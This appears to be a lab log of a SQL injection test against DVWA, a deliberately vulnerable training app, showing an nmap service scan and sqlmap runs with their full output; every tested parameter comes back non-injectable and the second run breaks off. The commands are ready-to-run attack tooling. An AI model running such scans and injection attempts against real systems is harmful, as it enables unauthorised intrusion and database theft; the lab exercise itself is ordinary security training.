Test for sql injection

Target = DVWA version 1.0.7

nmap the target


root@bt:~# nmap -sS -Pn -sV 172.16.0.12 -vvv

Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-27 03:40 SGT
NSE: Loaded 17 scripts for scanning.
Initiating ARP Ping Scan at 03:40
Scanning 172.16.0.12 [1 port]
Completed ARP Ping Scan at 03:40, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:40
Completed Parallel DNS resolution of 1 host. at 03:40, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 03:40
Scanning 172.16.0.12 [1000 ports]
Discovered open port 22/tcp on 172.16.0.12
Discovered open port 443/tcp on 172.16.0.12
Discovered open port 21/tcp on 172.16.0.12
Discovered open port 80/tcp on 172.16.0.12
Discovered open port 3306/tcp on 172.16.0.12
Completed SYN Stealth Scan at 03:40, 0.10s elapsed (1000 total ports)
Initiating Service scan at 03:40
Scanning 5 services on 172.16.0.12
Completed Service scan at 03:40, 12.09s elapsed (5 services on 1 host)
NSE: Script scanning 172.16.0.12.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 172.16.0.12
Host is up (0.00014s latency).
Scanned at 2012-10-27 03:40:34 SGT for 13s
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2c
22/tcp   open  ssh      OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
443/tcp  open  ssl/http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:5E:88:A5 (Cadmus Computer Systems)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:kernel

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.80 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.048KB)
root@bt:~#

The -sS is to use TCP syn, -sV is to find out the version of the service, -Pn is to disable ping to save time, -v(or multiple vs) is for verbose output.

From the nmap we know that the dbms is mysql.

SQLmap


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "172.16.0.12/vulnerabilities/sqli/" --data="id=a&Submit=Submit"  --dbms="mysql" --cookie="PHPSESSID=01ti90d7e7paq7vcgk0ajt3ii1; security=low" --level=5

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:16:15

[04:16:16] [INFO] testing connection to the target url
[04:16:16] [INFO] testing if the url is stable, wait a few seconds
[04:16:17] [INFO] url is stable
[04:16:17] [INFO] testing if POST parameter 'id' is dynamic
[04:16:17] [WARNING] POST parameter 'id' appears to be not dynamic
[04:16:17] [WARNING] reflective value(s) found and filtering out
[04:16:17] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable
[04:16:17] [INFO] testing for SQL injection on POST parameter 'id'
[04:16:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:16:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:16:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:16:24] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:16:26] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:16:26] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:16:26] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:16:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:16:26] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:16:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:16:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:16:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:16:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:16:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:16:31] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:16:31] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:16:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:16:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:16:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:16:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:16:40] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:16:47] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:16:53] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:16:59] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:17:06] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:17:12] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:17:18] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:17:25] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:17:31] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:17:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:17:44] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:17:52] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:17:59] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:18:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:18:13] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:18:20] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:18:27] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:18:33] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:18:40] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:18:46] [WARNING] POST parameter 'id' is not injectable
[04:18:46] [INFO] testing if POST parameter 'Submit' is dynamic
[04:18:46] [WARNING] POST parameter 'Submit' appears to be not dynamic
[04:18:46] [WARNING] heuristic test shows that POST parameter 'Submit' might not be injectable
[04:18:47] [INFO] testing for SQL injection on POST parameter 'Submit'
[04:18:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:18:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:18:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:18:53] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:18:55] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:18:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:18:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:18:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:18:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:18:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:18:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:18:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:18:56] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:18:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:18:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:19:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:19:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:19:01] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:19:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:19:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:19:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:19:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:19:11] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:19:18] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:19:24] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:19:30] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:19:36] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:19:42] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:19:49] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:19:55] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:20:01] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:20:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:20:15] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:20:22] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:20:28] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:20:34] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:20:40] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:20:46] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:20:53] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:20:59] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:21:05] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:21:11] [WARNING] POST parameter 'Submit' is not injectable
[04:21:11] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
sqlmap got a 302 redirect to 'http://172.16.0.12:80/login.php'. Do you want to follow? [Y/n] 

[04:22:30] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
[04:22:30] [INFO] Cookie parameter 'PHPSESSID' is dynamic
[04:22:30] [WARNING] heuristic test shows that Cookie parameter 'PHPSESSID' might not be injectable
[04:22:30] [INFO] testing for SQL injection on Cookie parameter 'PHPSESSID'
[04:22:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] 

[04:22:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:22:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:22:39] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:22:40] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:22:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:22:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:22:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:22:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:22:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:22:41] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:22:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:22:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:22:44] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:22:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:22:45] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:22:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:22:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:22:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:22:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:22:55] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:23:03] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:23:09] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:23:16] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:23:23] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:23:30] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:23:37] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:23:44] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:23:51] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:23:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:24:05] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:24:13] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:24:20] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:24:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:24:33] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:24:40] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:24:47] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:24:54] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:25:01] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:25:08] [WARNING] Cookie parameter 'PHPSESSID' is not injectable
[04:25:08] [WARNING] Cookie parameter 'security' appears to be not dynamic
[04:25:08] [WARNING] heuristic test shows that Cookie parameter 'security' might not be injectable
[04:25:08] [INFO] testing for SQL injection on Cookie parameter 'security'
[04:25:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:25:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:25:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:25:12] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:25:13] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:25:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:25:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:25:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:25:14] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:25:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:25:14] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:25:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:25:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:25:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:25:17] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:25:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:25:18] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:25:18] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:25:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:25:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:25:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:25:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:25:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:25:35] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:25:42] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:25:50] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:25:57] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:26:04] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:26:11] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:26:18] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:26:25] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:26:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:26:39] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:26:47] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:26:54] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:27:01] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:27:08] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:27:15] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:27:22] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:27:28] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:27:35] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:27:43] [WARNING] Cookie parameter 'security' is not injectable
[04:27:43] [WARNING] User-Agent parameter 'User-Agent' appears to be not dynamic
[04:27:43] [WARNING] heuristic test shows that User-Agent parameter 'User-Agent' might not be injectable
[04:27:43] [INFO] testing for SQL injection on User-Agent parameter 'User-Agent'
[04:27:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:27:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:27:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:27:47] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:27:48] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:27:48] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:27:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:27:49] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:27:49] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:27:49] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:27:49] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:27:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:27:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:27:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:27:52] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:27:53] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:27:53] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:27:53] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:27:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:27:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[04:27:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[04:27:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:28:03] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:28:11] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[04:28:18] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[04:28:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[04:28:32] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[04:28:39] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[04:28:46] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[04:28:53] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[04:29:00] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[04:29:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:29:14] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[04:29:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[04:29:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[04:29:35] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[04:29:43] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[04:29:50] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[04:29:57] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[04:30:04] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[04:30:11] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[04:30:18] [WARNING] User-Agent parameter 'User-Agent' is not injectable
[04:30:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[*] shutting down at 04:30:18

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.12/vulnerabilities/sqli/?id=a&Submit=Submit" --dbms="mysql" --level=5

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 04:43:44

[04:43:44] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://172.16.0.12:80/login.php'. Do you want to follow? [Y/n] 

[04:43:46] [INFO] testing if the url is stable, wait a few seconds
[04:43:47] [WARNING] GET parameter 'id' appears to be not dynamic
[04:43:47] [WARNING] reflective value(s) found and filtering out
[04:43:47] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[04:43:47] [INFO] testing for SQL injection on GET parameter 'id'
[04:43:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:43:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:43:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[04:43:54] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[04:43:56] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:43:56] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:43:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[04:43:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[04:43:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[04:43:57] [INFO] testing 'MySQL stacked conditional-error blind queries'
[04:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[04:43:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[04:44:00] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[04:44:01] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[04:44:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:44:02] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[04:44:02] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[04:44:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
